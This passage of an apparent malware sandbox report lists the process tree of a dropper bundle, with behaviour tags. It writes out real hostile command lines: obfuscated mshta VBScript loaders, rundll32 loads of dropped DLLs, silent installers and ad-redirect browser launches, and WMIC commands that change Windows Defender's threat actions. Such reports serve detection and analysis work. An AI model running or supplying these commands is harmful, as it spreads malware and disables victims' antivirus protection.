C:\Users\Admin\AppData\Local\Temp\is-3EGRN.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-3EGRN.tmp\Chmenka.exe" /S /UID=12410⤵
-
C:\Program Files\Microsoft Office\NASTWTQCUK\IDownload.exe"C:\Program Files\Microsoft Office\NASTWTQCUK\IDownload.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5T2GJ.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-5T2GJ.tmp\IDownload.tmp" /SL5="$5016A,994212,425984,C:\Program Files\Microsoft Office\NASTWTQCUK\IDownload.exe" /VERYSILENT12⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu13⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3-w2mifo.cmdline"14⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD83.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCD82.tmp"15⤵
-
C:\Users\Admin\AppData\Local\Temp\6e-a06dc-95b-cbbbf-108f288e91e0b\Fetushypoxu.exe"C:\Users\Admin\AppData\Local\Temp\6e-a06dc-95b-cbbbf-108f288e91e0b\Fetushypoxu.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471813⤵
-
C:\Users\Admin\AppData\Local\Temp\27-8346f-3e3-6638b-5379631ec7a06\Xibomaezheri.exe"C:\Users\Admin\AppData\Local\Temp\27-8346f-3e3-6638b-5379631ec7a06\Xibomaezheri.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ysfudsur.jrm\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ysfudsur.jrm\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ysfudsur.jrm\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 25614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spsg3hw3.d5e\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\spsg3hw3.d5e\installer.exeC:\Users\Admin\AppData\Local\Temp\spsg3hw3.d5e\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p3qh2o20.0ax\anyname.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\p3qh2o20.0ax\anyname.exeC:\Users\Admin\AppData\Local\Temp\p3qh2o20.0ax\anyname.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pzqbiu0i.jwj\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pzqbiu0i.jwj\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pzqbiu0i.jwj\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 26014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vl4dkug.fwr\autosubplayer.exe /S & exit12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\BuAfALSScZPvia0rwzZZf2A_.exe"C:\Users\Admin\Documents\BuAfALSScZPvia0rwzZZf2A_.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 2569⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\fUwK0rCKpuyFtdfYZy_fpV0h.exe"C:\Users\Admin\Documents\fUwK0rCKpuyFtdfYZy_fpV0h.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\fUwK0rCKpuyFtdfYZy_fpV0h.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\fUwK0rCKpuyFtdfYZy_fpV0h.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\fUwK0rCKpuyFtdfYZy_fpV0h.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF ""== "" for %w In ( "C:\Users\Admin\Documents\fUwK0rCKpuyFtdfYZy_fpV0h.exe" ) do taskkill /F -iM "%~nxw"8⤵
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ( "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "fUwK0rCKpuyFtdfYZy_fpV0h.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\YUPtFFQPemDo8n78Ec7z4ygG.exe"C:\Users\Admin\Documents\YUPtFFQPemDo8n78Ec7z4ygG.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\YUPtFFQPemDo8n78Ec7z4ygG.exeC:\Users\Admin\Documents\YUPtFFQPemDo8n78Ec7z4ygG.exe7⤵
-
C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"7⤵
-
C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"7⤵
-
C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"7⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"C:\Users\Admin\Documents\7LQ5elPYxvupKfFs3OysGmHL.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 20847⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\zJJYHy0TMgOHzTpL3lfNFi9x.exe"C:\Users\Admin\Documents\zJJYHy0TMgOHzTpL3lfNFi9x.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\zJJYHy0TMgOHzTpL3lfNFi9x.exe"C:\Users\Admin\Documents\zJJYHy0TMgOHzTpL3lfNFi9x.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\nfcV3KC6G8hE2evL_RwdX23Z.exe"C:\Users\Admin\Documents\nfcV3KC6G8hE2evL_RwdX23Z.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 8647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\kIZoFSN1Ya09FfBBE8IDq_FT.exe"C:\Users\Admin\Documents\kIZoFSN1Ya09FfBBE8IDq_FT.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\F_UgSqmF59dyv1FyDpFUys_Q.exe"C:\Users\Admin\Documents\F_UgSqmF59dyv1FyDpFUys_Q.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\AifKqp9KkRQTigggvWd7AkvD.exe"C:\Users\Admin\Documents\AifKqp9KkRQTigggvWd7AkvD.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5642601.scr"C:\Users\Admin\AppData\Roaming\5642601.scr" /S7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1104 -s 21408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2090b5515d63b2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu2090b5515d63b2.exeThu2090b5515d63b2.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpC7A5_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpC7A5_tmp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpC7A5_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpC7A5_tmp.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203cdb52ef3c6580d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu203cdb52ef3c6580d.exeThu203cdb52ef3c6580d.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu203cdb52ef3c6580d.exeC:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu203cdb52ef3c6580d.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20fdd9ac35a68.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20bc9ea26f.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2025d6674aed72ba.exe /mixone4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203b503b429e68.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20dae7c52bc0856.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20dae7c52bc0856.exeThu20dae7c52bc0856.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20bc9ea26f.exeThu20bc9ea26f.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 2602⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu2025d6674aed72ba.exeThu2025d6674aed72ba.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 2562⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu203b503b429e68.exeThu203b503b429e68.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 19682⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20fdd9ac35a68.exeThu20fdd9ac35a68.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5068 -ip 50681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4652 -ip 46521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5928 -ip 59281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 4522⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6920 -ip 69201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5020 -ip 50201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3940 -ip 39401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 512 -ip 5121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5976 -ip 59761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5968 -ip 59681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6100 -ip 61001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5888 -ip 58881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6132 -ip 61321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6392 -ip 63921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 5300 -ip 53001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 3480 -ip 34801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5856 -ip 58561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSFF1B.tmp\Install.exe.\Install.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS49A.tmp\Install.exe.\Install.exe /S /site_id "668658"2⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
